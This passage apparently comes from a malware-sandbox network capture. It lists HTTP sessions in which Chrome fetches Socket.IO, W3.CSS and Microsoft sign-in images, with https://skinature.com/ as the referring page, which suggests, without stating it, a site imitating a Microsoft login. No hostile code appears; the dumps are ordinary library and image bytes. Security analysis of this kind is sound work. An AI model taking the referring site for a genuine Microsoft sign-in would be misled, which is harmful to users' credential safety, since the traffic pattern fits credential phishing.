                                                                    2024-10-28 13:03:21 UTC276INData Raw: 1f 8b 08 00 00 00 00 00 04 00 95 51 3d 6f c3 20 10 fd 2b 88 ae e6 e0 08 d8 b8 b2 3d 74 ca 90 ae 1d ba 45 8a 6b 5b 22 1f aa 91 c9 cf 2f 67 3b 6e 87 2c 15 f0 80 bb 7b ef 9e a0 1a a7 8e dd cf fe 32 d6 bc 0f e1 f6 2a 65 8c 11 e2 0e ae df 9d d4 4a 29 99 2a 38 8b c3 29 f4 35 d7 86 b3 be 1d ba 3e 2c e7 69 68 e3 db f5 5e 73 c5 14 d3 26 4d de 54 61 08 be 6d 8e e3 d8 86 b1 92 cb ad ba 1d 43 cf 4e 35 7f 47 97 21 82 2d dc 04 ce 98 7d 01 39 16 7e 07 a5 c6 8c d0 09 b0 a5 a1 75 c8 33 d4 de 40 69 8c 98 71 4b cc 9c 55 e5 93 b3 af c1 fb 9a bf 18 45 83 cb bf bd 14 f1 b2 02 94 cd fd 53 fa 1e ff ef e3 ac 04 a0 41 01 aa c0 b4 0e 36 95 97 a4 47 9b 05 67 1d 11 d6 2c 66 33 67 c1 35 46 1b b1 49 9d da d8 47 40 3c 0e 98 4c 2e 3a 60 b5 4e 26 01 3f 52 03 93 0c cf 89 64 b4 b0 28 08 37
                                                                    Data Ascii: Q=o +=tEk["/g;n,{2*eJ)*8)5>,ih^s&MTamCN5G!-}9~u3@iqKUESA6Gg,f3g5FIG@<L.:`N&?Rd(7


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    32192.168.2.44977813.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:21 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:21 UTC470INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:21 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 407
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                    ETag: "0x8DC582BBAD04B7B"
                                                                    x-ms-request-id: 3c9c0adf-d01e-0028-0c96-257896000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130321Z-16849878b78fkwcjkpn19c5dsn00000003yg00000000mhb1
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:21 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    33192.168.2.44978318.245.31.334431704C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:21 UTC359OUTGET /4.7.5/socket.io.min.js HTTP/1.1
                                                                    Host: cdn.socket.io
                                                                    Connection: keep-alive
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept: */*
                                                                    Sec-Fetch-Site: none
                                                                    Sec-Fetch-Mode: cors
                                                                    Sec-Fetch-Dest: empty
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-10-28 13:03:22 UTC702INHTTP/1.1 200 OK
                                                                    Content-Type: application/javascript; charset=utf-8
                                                                    Content-Length: 49993
                                                                    Connection: close
                                                                    Accept-Ranges: bytes
                                                                    Access-Control-Allow-Origin: *
                                                                    Cache-Control: public, max-age=31536000, immutable
                                                                    Content-Disposition: inline; filename="socket.io.min.js"
                                                                    Date: Sat, 03 Aug 2024 07:26:50 GMT
                                                                    ETag: "777eb8fd4f8320b6e5cc9a7159bdec6a"
                                                                    Server: Vercel
                                                                    Strict-Transport-Security: max-age=63072000
                                                                    X-Vercel-Cache: HIT
                                                                    X-Vercel-Id: fra1::4xmtd-1722670010047-e30d468233ba
                                                                    X-Cache: Hit from cloudfront
                                                                    Via: 1.1 b81e506afc0d8b7cd6094e636331ca78.cloudfront.net (CloudFront)
                                                                    X-Amz-Cf-Pop: FRA56-P8
                                                                    X-Amz-Cf-Id: t6eessTiGkLkMyIthKqhOe94aJpRHdOiG2xnYSL5wDkbATSlXFvdVg==
                                                                    Age: 7827992
                                                                    2024-10-28 13:03:22 UTC15682INData Raw: 2f 2a 21 0a 20 2a 20 53 6f 63 6b 65 74 2e 49 4f 20 76 34 2e 37 2e 35 0a 20 2a 20 28 63 29 20 32 30 31 34 2d 32 30 32 34 20 47 75 69 6c 6c 65 72 6d 6f 20 52 61 75 63 68 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 74 29 3a 28 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67
                                                                    Data Ascii: /*! * Socket.IO v4.7.5 * (c) 2014-2024 Guillermo Rauch * Released under the MIT License. */!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof g
                                                                    2024-10-28 13:03:22 UTC16384INData Raw: 64 20 74 68 69 73 2e 73 65 74 54 69 6d 65 6f 75 74 46 6e 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 6f 6e 45 72 72 6f 72 28 65 29 7d 29 2c 30 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 64 6f 63 75 6d 65 6e 74 26 26 28 74 68 69 73 2e 69 6e 64 65 78 3d 69 2e 72 65 71 75 65 73 74 73 43 6f 75 6e 74 2b 2b 2c 69 2e 72 65 71 75 65 73 74 73 5b 74 68 69 73 2e 69 6e 64 65 78 5d 3d 74 68 69 73 29 7d 7d 2c 7b 6b 65 79 3a 22 6f 6e 45 72 72 6f 72 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 65 72 72 6f 72 22 2c 65 2c 74 68 69 73 2e 78 68 72 29 2c 74 68 69 73 2e 63 6c 65 61 6e 75 70 28 21 30 29 7d 7d 2c 7b 6b 65 79 3a 22 63 6c 65 61 6e 75 70 22 2c 76 61 6c 75 65 3a 66 75 6e
                                                                    Data Ascii: d this.setTimeoutFn((function(){t.onError(e)}),0)}"undefined"!=typeof document&&(this.index=i.requestsCount++,i.requests[this.index]=this)}},{key:"onError",value:function(e){this.emitReserved("error",e,this.xhr),this.cleanup(!0)}},{key:"cleanup",value:fun
                                                                    2024-10-28 13:03:22 UTC16384INData Raw: 65 2e 64 61 74 61 2c 69 64 3a 65 2e 69 64 7d 29 7d 7d 2c 7b 6b 65 79 3a 22 65 6e 63 6f 64 65 41 73 53 74 72 69 6e 67 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 22 2b 65 2e 74 79 70 65 3b 72 65 74 75 72 6e 20 65 2e 74 79 70 65 21 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 45 56 45 4e 54 26 26 65 2e 74 79 70 65 21 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 41 43 4b 7c 7c 28 74 2b 3d 65 2e 61 74 74 61 63 68 6d 65 6e 74 73 2b 22 2d 22 29 2c 65 2e 6e 73 70 26 26 22 2f 22 21 3d 3d 65 2e 6e 73 70 26 26 28 74 2b 3d 65 2e 6e 73 70 2b 22 2c 22 29 2c 6e 75 6c 6c 21 3d 65 2e 69 64 26 26 28 74 2b 3d 65 2e 69 64 29 2c 6e 75 6c 6c 21 3d 65 2e 64 61 74 61 26 26 28 74 2b 3d 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 65 2e 64 61 74 61 2c 74 68 69
                                                                    Data Ascii: e.data,id:e.id})}},{key:"encodeAsString",value:function(e){var t=""+e.type;return e.type!==Be.BINARY_EVENT&&e.type!==Be.BINARY_ACK||(t+=e.attachments+"-"),e.nsp&&"/"!==e.nsp&&(t+=e.nsp+","),null!=e.id&&(t+=e.id),null!=e.data&&(t+=JSON.stringify(e.data,thi
                                                                    2024-10-28 13:03:22 UTC1543INData Raw: 65 74 54 69 6d 65 6f 75 74 46 6e 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 73 6b 69 70 52 65 63 6f 6e 6e 65 63 74 7c 7c 28 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 72 65 63 6f 6e 6e 65 63 74 5f 61 74 74 65 6d 70 74 22 2c 74 2e 62 61 63 6b 6f 66 66 2e 61 74 74 65 6d 70 74 73 29 2c 74 2e 73 6b 69 70 52 65 63 6f 6e 6e 65 63 74 7c 7c 74 2e 6f 70 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6e 3f 28 74 2e 5f 72 65 63 6f 6e 6e 65 63 74 69 6e 67 3d 21 31 2c 74 2e 72 65 63 6f 6e 6e 65 63 74 28 29 2c 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 72 65 63 6f 6e 6e 65 63 74 5f 65 72 72 6f 72 22 2c 6e 29 29 3a 74 2e 6f 6e 72 65 63 6f 6e 6e 65 63 74 28 29 7d 29 29 29 7d 29 2c 6e 29 3b 74 68 69 73 2e 6f 70 74 73 2e 61 75 74 6f 55 6e 72 65 66 26 26 72 2e
                                                                    Data Ascii: etTimeoutFn((function(){t.skipReconnect||(e.emitReserved("reconnect_attempt",t.backoff.attempts),t.skipReconnect||t.open((function(n){n?(t._reconnecting=!1,t.reconnect(),e.emitReserved("reconnect_error",n)):t.onreconnect()})))}),n);this.opts.autoUnref&&r.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    34192.168.2.449767192.229.133.2214431704C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:21 UTC542OUTGET /w3css/4/w3.css HTTP/1.1
                                                                    Host: www.w3schools.com
                                                                    Connection: keep-alive
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Accept: text/css,*/*;q=0.1
                                                                    Sec-Fetch-Site: cross-site
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: style
                                                                    Referer: https://skinature.com/
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-10-28 13:03:21 UTC581INHTTP/1.1 200 OK
                                                                    Age: 533483
                                                                    Cache-Control: public,max-age=31536000,public
                                                                    Content-Security-Policy: frame-ancestors 'self' https://mycourses.w3schools.com https://pathfinder.w3schools.com;
                                                                    Content-Type: text/css
                                                                    Date: Mon, 28 Oct 2024 13:03:21 GMT
                                                                    Etag: "0a29a965824db1:0+gzip+ident"
                                                                    Last-Modified: Tue, 22 Oct 2024 08:01:24 GMT
                                                                    Server: ECS (lhd/35B3)
                                                                    Vary: Accept-Encoding
                                                                    X-Cache: HIT
                                                                    X-Content-Security-Policy: frame-ancestors 'self' https://mycourses.w3schools.com https://pathfinder.w3schools.com;
                                                                    X-Powered-By: ASP.NET
                                                                    Content-Length: 23427
                                                                    Connection: close
                                                                    2024-10-28 13:03:22 UTC16383INData Raw: ef bb bf 2f 2a 20 57 33 2e 43 53 53 20 34 2e 31 35 20 44 65 63 65 6d 62 65 72 20 32 30 32 30 20 62 79 20 4a 61 6e 20 45 67 69 6c 20 61 6e 64 20 42 6f 72 67 65 20 52 65 66 73 6e 65 73 20 2a 2f 0a 68 74 6d 6c 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 2a 2c 2a 3a 62 65 66 6f 72 65 2c 2a 3a 61 66 74 65 72 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 69 6e 68 65 72 69 74 7d 0a 2f 2a 20 45 78 74 72 61 63 74 20 66 72 6f 6d 20 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 62 79 20 4e 69 63 6f 6c 61 73 20 47 61 6c 6c 61 67 68 65 72 20 61 6e 64 20 4a 6f 6e 61 74 68 61 6e 20 4e 65 61 6c 20 67 69 74 2e 69 6f 2f 6e 6f 72 6d 61 6c 69 7a 65 20 2a 2f 0a 68 74 6d 6c 7b 2d 6d 73 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 77 65 62
                                                                    Data Ascii: /* W3.CSS 4.15 December 2020 by Jan Egil and Borge Refsnes */html{box-sizing:border-box}*,*:before,*:after{box-sizing:inherit}/* Extract from normalize.css by Nicolas Gallagher and Jonathan Neal git.io/normalize */html{-ms-text-size-adjust:100%;-web
                                                                    2024-10-28 13:03:22 UTC7044INData Raw: 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 62 63 64 34 21 69 6d 70 6f 72 74 61 6e 74 7d 0a 2e 77 33 2d 62 6c 75 65 2d 67 72 65 79 2c 2e 77 33 2d 68 6f 76 65 72 2d 62 6c 75 65 2d 67 72 65 79 3a 68 6f 76 65 72 2c 2e 77 33 2d 62 6c 75 65 2d 67 72 61 79 2c 2e 77 33 2d 68 6f 76 65 72 2d 62 6c 75 65 2d 67 72 61 79 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 36 30 37 64 38 62 21 69 6d 70 6f 72 74 61 6e 74 7d 0a 2e 77 33 2d 67 72 65 65 6e 2c 2e 77 33 2d 68 6f 76 65 72 2d 67 72 65 65 6e 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23
                                                                    Data Ascii: !important;background-color:#00bcd4!important}.w3-blue-grey,.w3-hover-blue-grey:hover,.w3-blue-gray,.w3-hover-blue-gray:hover{color:#fff!important;background-color:#607d8b!important}.w3-green,.w3-hover-green:hover{color:#fff!important;background-color:#


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    35192.168.2.449772152.199.21.1754431704C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:21 UTC657OUTGET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1
                                                                    Host: aadcdn.msftauth.net
                                                                    Connection: keep-alive
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                    Sec-Fetch-Site: cross-site
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: image
                                                                    Referer: https://skinature.com/
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-10-28 13:03:22 UTC738INHTTP/1.1 200 OK
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                    Age: 18775773
                                                                    Cache-Control: public, max-age=31536000
                                                                    Content-MD5: 1jQlecEJaGhFO2st5KXLhg==
                                                                    Content-Type: image/svg+xml
                                                                    Date: Mon, 28 Oct 2024 13:03:21 GMT
                                                                    Etag: 0x8DB5C3F4AC59B47
                                                                    Last-Modified: Wed, 24 May 2023 10:11:51 GMT
                                                                    Server: ECAcc (lhc/78BB)
                                                                    Vary: Accept-Encoding
                                                                    X-Cache: HIT
                                                                    x-ms-blob-type: BlockBlob
                                                                    x-ms-lease-status: unlocked
                                                                    x-ms-request-id: 2ee1dbb1-b01e-00dc-3276-7e9a59000000
                                                                    x-ms-version: 2009-09-19
                                                                    Content-Length: 1636
                                                                    Connection: close
                                                                    2024-10-28 13:03:22 UTC1636INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 38 2c 31 34 48 31 30 56 33 34 48 33 38 56 31 34 6d 32 2c 32 32 48 38 56 31 32 48 34 30 56 33 36 4d 31 37 2e 36 38 38 2c 31 38 2e 38 56 32 38 2e 38 32 38 48 31 35 2e 35 33 31 56 32 31 2e 32 33 34 61 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2d 2e 36 37 32 2e 34 33 6c 2d 2e 32 36 36 2e 31 31 37 61
                                                                    Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    36192.168.2.44979213.107.246.454431704C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:22 UTC418OUTGET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1
                                                                    Host: aadcdn.msauth.net
                                                                    Connection: keep-alive
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept: */*
                                                                    Sec-Fetch-Site: none
                                                                    Sec-Fetch-Mode: cors
                                                                    Sec-Fetch-Dest: empty
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-10-28 13:03:22 UTC779INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:22 GMT
                                                                    Content-Type: image/svg+xml
                                                                    Content-Length: 1435
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=31536000
                                                                    Content-Encoding: gzip
                                                                    Last-Modified: Wed, 24 May 2023 10:11:48 GMT
                                                                    ETag: 0x8DB5C3F4911527F
                                                                    x-ms-request-id: 00233da3-801e-0004-566c-2771fc000000
                                                                    x-ms-version: 2009-09-19
                                                                    x-ms-lease-status: unlocked
                                                                    x-ms-blob-type: BlockBlob
                                                                    Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                    Access-Control-Allow-Origin: *
                                                                    x-azure-ref: 20241028T130322Z-16849878b78bjkl8dpep89pbgg00000003s000000000azqu
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:22 UTC1435INData Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5
                                                                    Data Ascii: WMo7+uVHJ{&v(QFaWQ|~|{~b{8zv8|bgxby{x<\lSppl7o}vtrr|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    37192.168.2.44979313.107.246.454431704C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:22 UTC416OUTGET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1
                                                                    Host: logincdn.msauth.net
                                                                    Connection: keep-alive
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept: */*
                                                                    Sec-Fetch-Site: none
                                                                    Sec-Fetch-Mode: cors
                                                                    Sec-Fetch-Dest: empty
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-10-28 13:03:22 UTC799INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:22 GMT
                                                                    Content-Type: image/svg+xml
                                                                    Content-Length: 276
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=31536000
                                                                    Content-Encoding: gzip
                                                                    Last-Modified: Wed, 22 Jan 2020 00:38:00 GMT
                                                                    ETag: 0x8D79ED35591CF44
                                                                    x-ms-request-id: 553ba476-201e-006c-5f1c-2928c1000000
                                                                    x-ms-version: 2009-09-19
                                                                    x-ms-lease-status: unlocked
                                                                    x-ms-blob-type: BlockBlob
                                                                    Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                    Access-Control-Allow-Origin: *
                                                                    x-azure-ref: 20241028T130322Z-16849878b786lft2mu9uftf3y4000000069000000000cne0
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    X-Cache-Info: L1_T2
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:22 UTC276INData Raw: 1f 8b 08 00 00 00 00 00 04 00 95 51 3d 6f c3 20 10 fd 2b 88 ae e6 e0 08 d8 b8 b2 3d 74 ca 90 ae 1d ba 45 8a 6b 5b 22 1f aa 91 c9 cf 2f 67 3b 6e 87 2c 15 f0 80 bb 7b ef 9e a0 1a a7 8e dd cf fe 32 d6 bc 0f e1 f6 2a 65 8c 11 e2 0e ae df 9d d4 4a 29 99 2a 38 8b c3 29 f4 35 d7 86 b3 be 1d ba 3e 2c e7 69 68 e3 db f5 5e 73 c5 14 d3 26 4d de 54 61 08 be 6d 8e e3 d8 86 b1 92 cb ad ba 1d 43 cf 4e 35 7f 47 97 21 82 2d dc 04 ce 98 7d 01 39 16 7e 07 a5 c6 8c d0 09 b0 a5 a1 75 c8 33 d4 de 40 69 8c 98 71 4b cc 9c 55 e5 93 b3 af c1 fb 9a bf 18 45 83 cb bf bd 14 f1 b2 02 94 cd fd 53 fa 1e ff ef e3 ac 04 a0 41 01 aa c0 b4 0e 36 95 97 a4 47 9b 05 67 1d 11 d6 2c 66 33 67 c1 35 46 1b b1 49 9d da d8 47 40 3c 0e 98 4c 2e 3a 60 b5 4e 26 01 3f 52 03 93 0c cf 89 64 b4 b0 28 08 37
                                                                    Data Ascii: Q=o +=tEk["/g;n,{2*eJ)*8)5>,ih^s&MTamCN5G!-}9~u3@iqKUESA6Gg,f3g5FIG@<L.:`N&?Rd(7


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    38192.168.2.44978913.107.246.454431704C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:22 UTC438OUTGET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1
                                                                    Host: aadcdn.msauth.net
                                                                    Connection: keep-alive
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept: */*
                                                                    Sec-Fetch-Site: none
                                                                    Sec-Fetch-Mode: cors
                                                                    Sec-Fetch-Dest: empty
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-10-28 13:03:22 UTC779INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:22 GMT
                                                                    Content-Type: image/svg+xml
                                                                    Content-Length: 2407
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=31536000
                                                                    Content-Encoding: gzip
                                                                    Last-Modified: Wed, 24 May 2023 10:11:49 GMT
                                                                    ETag: 0x8DB5C3F499A9B99
                                                                    x-ms-request-id: 7677466b-301e-002d-2c36-277025000000
                                                                    x-ms-version: 2009-09-19
                                                                    x-ms-lease-status: unlocked
                                                                    x-ms-blob-type: BlockBlob
                                                                    Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                    Access-Control-Allow-Origin: *
                                                                    x-azure-ref: 20241028T130322Z-16849878b78wv88bk51myq5vxc00000005b0000000009x0w
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
